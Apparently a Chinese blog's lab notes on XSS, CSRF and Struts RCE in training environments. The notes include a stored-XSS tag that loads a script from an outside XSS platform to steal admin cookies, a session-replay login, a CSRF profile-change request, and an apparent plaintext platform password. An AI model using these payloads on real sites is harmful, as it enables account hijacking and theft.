XSS,CSRF,SSRF,RCE

article/2025/11/4 21:15:05

#cookie session
用户凭据:通过凭据可以判断对方身份信息
cookie 存储本地 存活时间较长 小中型
session 会话 存储服务器 存活时间较短 大型

有可能项目有错误,原因就是不能放在其他文件夹的路径中

admin   123456

 

一般来说只要前后端数据交互的地方就有可能XSS跨站攻击

提价成功

<script>alert(1)</script>

后台弹出恶意代码

而且是存储型的,刷新一次弹出一次

 很明显语句插入了前端

 

攻击平台如下

XSS平台-XSS安全测试平台

 991206wxyWXY

 

<sCRiPt/SrC=//xss.yt/BtDs>

 

 成功插入,这是管理查看订单

此时刷新项目,发现盗取了cookie

相关重要信息

 可以利用cookie或者后台地址进行登录

利用postman进行组合拳

设置提交方式,模拟数据包的发送

复制地址

 先用原始cookie尝试一下

首先不修改看返回的情况

 下面先使用自己浏览器的cookie

 成功返回登录内容

图形化界面

总结:也就是说通XSS攻击盗取cookie,然后进行登录

大马-------后门中再一次嵌入后门,有人在你使用的后门中再一次创建后门,你的信息会发送到一个webshell的箱子

RCE:代码执行漏洞,命令执行漏洞

要看网站是干嘛的,没有拓展的功能基本就是够呛

RCE strtus远程执行漏洞复现

S2-061

CVE-2020=17530复现

搭建环境

https://github.com/vulhub/vulhub/

下载vulhub--master

查看漏洞环境

进入S2-061目录

使用docker-compose -d拉取项目

  有可能出现失败情况

 解决办法

1.出现这个问题是因为当前用户权限的问题,只要将当前用户加入docker组就可以啦~
解决方案:

如果还没有 docker group 就添加一个
sudo groupadd docker
2、将用户加入该 group 内。然后退出并重新登录就生效啦。
sudo gpasswd -a ${USER} docker
3、重启 docker 服务
sudo service docker restart
4、切换当前会话到新 group 或者重启 X 会话
newgrp - docker
注意:最后一步是必须的,否则因为 groups 命令获取到的是缓存的组信息,刚添加的组信息未能生效,所以 docker images 执行时同样有错。`

导致这个问题的原因实在多,所以把解决方法一一列出。

1、docker服务启动

$ sudo systemctl start docker     // 或者 sudo service docker start
$ docker-compose up

2、docker服务启动了,但是一些缓存影响了

那就重启

$ sudo systemctl restart docker   // 或者 sudo service docker restart
$ docker-compose up</pre>

3 当前用户不在docker用户组

那就把自己加到docker用户组

$ sudo gpasswd -a ${USER} docker
$ docker-compose up

添加到docker用户组后要重新登录shell再up

4 也许用sudo可能有效

$ sudo docker-compose up

5 docker-compose版本太老了

那就更新版本

$ sudo curl -L "https://github.com/docker/compose/releases/download/1.23.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
$ sudo chmod +x /usr/local/bin/docker-compose
$ docker-compose up

点击这里查看docker-compose官方安装教程(可能需要梯子)。

6 重启系统吧

$ sudo reboot
$ docker-compose up


出现

表示成功

docker还是没有端口,有待解决

一句话WebShell原理

其实点击后门软件的情况下已经发送了大量的数据包,才能进行远控

CSRF

 修改个人信息抓包

http://192.168.111.136/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=1367676776711&add=nba+76&email=allen%40pikachu.com&submit=submit

测试一下修改的数据包

 

修改成功

那么这个时候把数据包提取,放到服务器上

<script src=''>http://192.168.111.136/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=1367676776711&add=nba+76&email=allen%40pikachu.com&submit=submit<script src=''></script>

修改数据包

 访问服务器的时候,会直接触发服务器中的恶意代码

 

这时候再刷新页面修改成功

 总结:恶意代码写到服务器中,别人访问服务器直接触发

防御:同源检测,唯一Token

SSRF


http://chatgpt.dhexx.cn/article/KJ4j6Thk.shtml

相关文章

CSRF+Self XSS

目录 前言 CSRF漏洞检测 复现 环境 1.构造xss(反射型)poc 2.构造csrf poc 3.使用CSRFTester工具生成CSRF poc 3.1打开工具 3.2设置浏览器代理 3.3用户登录 3.4抓取和伪造请求 4.访问修改后的url(模仿用户访问) 前言 CSRF&#xff0c;跨站请求攻击&#xff0c;简单…

XSRF 防御

XSRF 又名 CSRF (opens new window)&#xff0c;跨站请求伪造&#xff0c;它是前端常见的一种攻击方式&#xff0c;我们先通过一张图来认识它的攻击手段。 CSRF 的防御手段有很多&#xff0c;比如验证请求的 referer&#xff0c;但是 referer 也是可以伪造的&#xff0c;所以杜…

8、防护XSRF的方式:post请求之类伪造请求

“学习或者了解人工智能小伙伴福利来了&#xff0c;前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&#xff0c;忍不住分享一下给大家。” 想了解或者学习人工智能可以看一下&#xff0c;我觉得学习起来挺有趣的&#xff01;&#xff01;&am…

【xss结合csrf实验】

文章目录 前言一、实验介绍二、实验步骤1.用户登录2.抓取信息修改的url3.构造xss语句4.插入xss语句5.查看用户信息已被修改 总结 前言 通常xss漏洞可以和csrf漏洞结合使用&#xff0c;今天就做一个小的实验举例 一、实验介绍 漏洞主要利用的是用户修改敏感信息的未退出状态&a…

XSS和CSRF攻击

一、XSS攻击&#xff08;跨脚本攻击&#xff09; 是一种普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中&#xff0c;当正常用户访问该页面时&#xff0c;则可导致嵌入的恶意脚本代码的执行&#xff0c;从而达到恶意攻击用户的目的…

前端安全之XSS和XSRF攻击,及其解决方案

xss攻击&#xff1a; Cross Site Scripting&#xff1a;跨站脚本 &#xff08;不用CSS&#xff0c;是因为CSS已经代表了样式。而X有未知和扩展的含义。&#xff09; 通过document.cookie获取用户的cookie&#xff0c;解决方案&#xff1a;重要的cookie要HttpOnly请求&#xf…

【安全】CSRF与XSS

CSRF和XSS概念 CSRF&#xff1a;跨站请求伪造&#xff08; cross site request forgery)&#xff1a;盗用用户在某网站的身份&#xff0c;以用户名义向某网站发起恶意请求。原理见下图&#xff1a; 上图中的恶意站点B&#xff0c;有时候可能其实是一个正常的网站。这时候通常…

jupyter ‘_xsrf‘ argument missing from post 解决方案

大家好,我是爱编程的喵喵。双985硕士毕业,现担任全栈工程师一职,热衷于将数据思维应用到工作与生活中。从事机器学习以及相关的前后端开发工作。曾在阿里云、科大讯飞、CCF等比赛获得多次Top名次。现为CSDN博客专家、人工智能领域优质创作者。喜欢通过博客创作的方式对所学的…

详解XSS和CSRF

关于XSS xss是跨站脚本攻击&#xff0c;攻击者通过“注入”&#xff0c;在网页中插入恶意代码&#xff0c;从而被浏览器执行所造成的一种攻击方式。 举一些实例&#xff0c;它可以进行如下操作&#xff1a; 1.窃取用户的cookie信息。恶意代码可以通过执行 ”doccument.cooki…

XSRF CRFS(跨站请求伪造,单点登录攻击) 特点和原理

CSRF 特点和原理 CSRF&#xff1a;Cross Site Request Forgery&#xff0c;跨站请求伪造 概念&#xff1a;跨站请求伪造&#xff08;英语&#xff1a;Cross-site request forgery&#xff09;&#xff0c;也被称为 one-click attack 或者 session riding&#xff0c;通常缩写为…

Linux常用命令——tail命令

在线Linux命令查询工具(http://www.lzltool.com/LinuxCommand) tail 在屏幕上显示指定文件的末尾若干行 补充说明 tail命令用于输入文件中的尾部内容。tail命令默认在屏幕上显示指定文件的末尾10行。如果给定的文件不止一个&#xff0c;则在显示的每个文件前面加一个文件名…

Linux中tail命令的使用

tail 命令可用于查看文件的内容&#xff0c;有一个常用的参数 -f 常用于查阅正在改变的日志文件。 tail -f filename 会把 filename 文件里的最尾部的内容显示在屏幕上&#xff0c;并且不断刷新&#xff0c;只要 filename 更新就可以看到最新的文件内容。 tail [参数] [文件] …

Linux tail 命令

tail 命令可用于查看文件的内容&#xff0c;有一个常用的参数 -f 常用于查阅正在改变的日志文件。 tail -f filename 会把 filename 文件里的最尾部的内容显示在屏幕上&#xff0c;并且不断刷新&#xff0c;只要 filename 更新就可以看到最新的文件内容。 命令格式&#xff1a…

关于tail 命令

tail命令 用于输入文件中的尾部内容。tail命令默认在屏幕上显示指定文件的末尾10行。如果给定的文件不止一个&#xff0c;则在显示的每个文件前面加一个文件名标题。如果没有指定文件或者文件名为“-”&#xff0c;则读取标准输入。 1.如果给定的文件不止一个&#xff0c;则在…

Linux命令-tail

1、tail 对应中文意思为“尾巴”“跟踪” 2、Linux系统中tail 命令用于将每个文件的最后10行打印到标准输出 3、tail -f filename 会把filename文件里的最尾部的内容显示在屏幕上 并且不断刷新 只要filename更新就可以看到最新的文件内容 常用于追踪文件内容 4、实例 tail …

tail命令,实时查看日志文件

一、前言 Linux 实时查看日志文件&#xff0c;最主要使用的就是tail命令。 linux tail命令用于显示文件尾部的内容&#xff0c;默认在屏幕上显示指定文件的末尾10行。如果给定的文件不止一个&#xff0c;则在显示的每个文件前面加一个文件名标题。如果没有指定文件或者文件名…

Linux - tail命令详解

一、作用 查看应用项目日志信息 说明&#xff1a;一般在应用项目目录下有个logs的目录文件&#xff0c;会存放日志文件&#xff0c;有个xxx.log的文件&#xff0c;可以用tail -f 动态实时查看后端日志二、语法 tail [选项] 文件名选项说明-f实时读取-1000查看最近1000行日志 …

windows下使用tail命令

tail 命令为linux 下的常用查看日志命令&#xff0c;可惜在windows下没有&#xff0c;还好有好心人开发了一个可以在Windows下的运行的小工具&#xff0c;来给分享一下: 链接: https://pan.baidu.com/s/1-LiogYgYcAEbZUstdEZURg 密码: 1w6p 使用方法&#xff1a; 下载后解压…

linux命令tail-f,【玩转Linux命令】tail命令详解

Hi&#xff0c;明娜桑&#xff0c;哦哈哟~。 今天小编给大家带来的“玩转linux命令之tail篇”&#xff0c;tail命令是咱们工作中经常用到的命令&#xff0c;常用于动态文件的查看&#xff0c;接下来搜狗华安带你来一起了解tail命令。 tail命令简介 linux tail命令用途是按照要求…

Linux之tail命令

tail命令从指定点将文件写到标准输出,使用tail命令的-f选项可以方便的查看正在改变的日志。tail -f nohup.out会把nohup.out最尾部的内容显示在屏幕上,并且不断刷新,能一直看到最新的文件内容。 命令格式 tail [必要参数] [选择参数] [文件] 命令功能 使用tail命令可以查看文…